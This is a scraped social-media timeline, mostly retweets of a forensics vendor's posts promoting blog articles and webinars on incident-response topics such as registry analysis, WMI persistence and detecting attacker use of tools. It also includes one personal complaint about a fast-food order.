@markmckinnon@infosec.exchange.
Joined April 2008
- Tweets 4,235
- Following 210
- Followers 376
- Likes 172
48 Photos and videos
markmckinnon retweeted
2 Apr 2025
Windows registry can contain evidence of:
→ Execution
→ Persistence
→ Data accessed
Our overview of the registry and tools for analyzing it: cybertriage.com/blog/2025-gu…
9
26
865
markmckinnon retweeted
20 Mar 2025
One prioritizes alerts.
One prioritizes devices.
And SOCs must do both.
@carrier4n6 explains: cybertriage.com/blog/alert-t…
1
4
145
markmckinnon retweeted
6 Feb 2025
3 reasons attackers use WMI Event Consumers:
→ Stealth and evasion
→ Fileless persistence
→ Event-driven execution
Learn how to investigate evil WMI event consumers: cybertriage.com/blog/how-to-…
4
11
488
markmckinnon retweeted
29 Jan 2025
Are you ready?
@carrier4n6 teaches endpoint triage tomorrow!
Triage investigations tell you:
→ What happened on your system
→ What to prioritize during the investigation
Don’t be a square.
(Or, do be?)
Either way, here’s how to register: attendee.gotowebinar.com/reg…
1
5
9
769
markmckinnon retweeted
15 Jan 2025
4 user activity insights from jump lists:
→ Files a user has accessed
→ Applications used to access files
→ Frequency files have been accessed
→ Evidence of files no longer on the system
Learn how our DFIR experts do jump list forensics: cybertriage.com/blog/jump-li…
5
15
1,019
markmckinnon retweeted
9 Jan 2025
The DFIR concept you should be using.
(but aren’t) ⤵
“Information Artifacts”
Learn how to use this concept to make your investigations more efficient from @carrier4n6 → cybertriage.com/blog/informa…
7
13
1,094
markmckinnon retweeted
10 Dec 2024
EDRs won’t collect all DFIR Artifacts.
5 ways to deploy DFIR tools to help your investigation ⤵
Try all these methods with Cyber Triage Team SentinelOne Singularity, Windows Defender, and CrowdStrike Falcon.
P.S. Which method do you use?
2
7
271
markmckinnon retweeted
14 Nov 2024
3 examples of sneaky remote access:
Malicious RATs
Commercial Remote Access
Remote Windows Access
Attackers can use these to place incriminating evidence on an innocent user’s system.
A suspect can claim the “Trojan Defense”
How to back your claim: cybertriage.com/blog/dfir-ar…
2
7
198
markmckinnon retweeted
13 Nov 2024
Why “adaptive” collection kicks @$$
DFIR collection is about 2 things:
#1 Getting all the evidence.
#2 Getting it quickly.
“Static” collectors focus only on #2.
“Adaptive” collectors do both.
(That’s why Cyber Triage comes with one)
Learn more → cybertriage.com/blog/adaptiv…
5
15
806
markmckinnon retweeted
6 Nov 2024
Think your Linux system is compromised?
Investigate it with UAC ⤵
UAC is an open-source static collection tool designed to collect key forensic artifacts from “nix” systems.
Review the suspicious items in the output with Cyber Triage!
cybertriage.com/blog/collect…
16
33
1,637
markmckinnon retweeted
31 Oct 2024
Attackers can evade you with one *tiny* change.
It can cause you to not detect malware and miss evidence in your investigation.
Learn how Cyber Triage uses ImpHash to detect fuzzy hashes in malware: cybertriage.com/blog/intro-t…
1
4
234
markmckinnon retweeted
29 Oct 2024
4 EDR blindspots for DFIR:
• Attackers can avoid EDRs
• Retention policies limit data
• Detection focus also limits data
• Bias against false positives misses investigative clues
Augment your Windows Defender with CT to avoid these blindspots: cybertriage.com/blog/how-to-….
8
17
966
markmckinnon retweeted
1 Oct 2024
Cyber Triage 3.12 is out now!
This release introduces new key features with the focus of making your response even faster!
Join us for a webinar October 9th 1PM EDT to see these features in action
Read more here: cybertriage.com/blog/release…
Webinar SignUp: register.gotowebinar.com/reg…
4
6
806
markmckinnon retweeted
30 Aug 2024
DFIR Breakdown: Impacket Remote Execution Activity – atexec
This blog post focuses on the script atexec.py - which can be abused by threat actors - and how to detect its remote execution activity from various DFIR artifacts.
cybertriage.com/blog/dfir-br…
6
11
983
markmckinnon retweeted
26 Aug 2024
Have you ever needed to collect DFIR artifacts using a local non-DFIR person who didn’t want to use the command line?
Check out this video included in our freely available training course materials now up on our YouTube channel!
youtube.com/watch?v=fOT_Sahe…
4
7
798
27 Aug 2024
Glad I chose @Arbys drive thru tonight. Would have been nice to get the chicken portion of my chicken bacon and Swiss sandwich. Highlight of the meal were the fries dipped in Arby’s and horsey sauce as they were the only thing correct in the order.
1
1
95
markmckinnon retweeted
19 Aug 2024
New "DFIR Next Steps" post on what to do when an alert relating to the use of curl.exe is raised.
This post walks through a scenario suspecting that curl was used to download a rootkit or malware to the host and the three steps to take afterwards.
cybertriage.com/blog/dfir-ne…
4
8
778
markmckinnon retweeted
25 Jul 2024
DFIR Breakdown: Using Certutil To Download Attack Tools
Windows certutil is a Windows utility that is used by threat actors during an attack to achieve some malicious goal by installing their own certificates on a system.
Learn more and be prepared: hubs.li/Q02HYsDV0
13
26
1,606
markmckinnon retweeted
18 Jul 2024
#LearnDFIR next week with a Fuzzy Malware Hashing Webinar. Tues at 1PM Eastern.
We’ll look at:
* Several fuzzy matching algorithms, such as ImpHash, ssdeep, and TLSH.
* Pros and cons of them
* Which can be used in DFIR
attendee.gotowebinar.com/reg…
4
2
815
markmckinnon retweeted
10 Jul 2024
Webinar at 1 today talking about BitLocker and other expanded disk image features in Cyber Triage.
Hope to see you there.
10 Jul 2024
Webinar at 1PM EDT Today!
We will cover key new features in the latest Cyber Triage release so that you can most effectively use what's been added.
Register here: hubs.li/Q02F-xJK0
3
3
1,209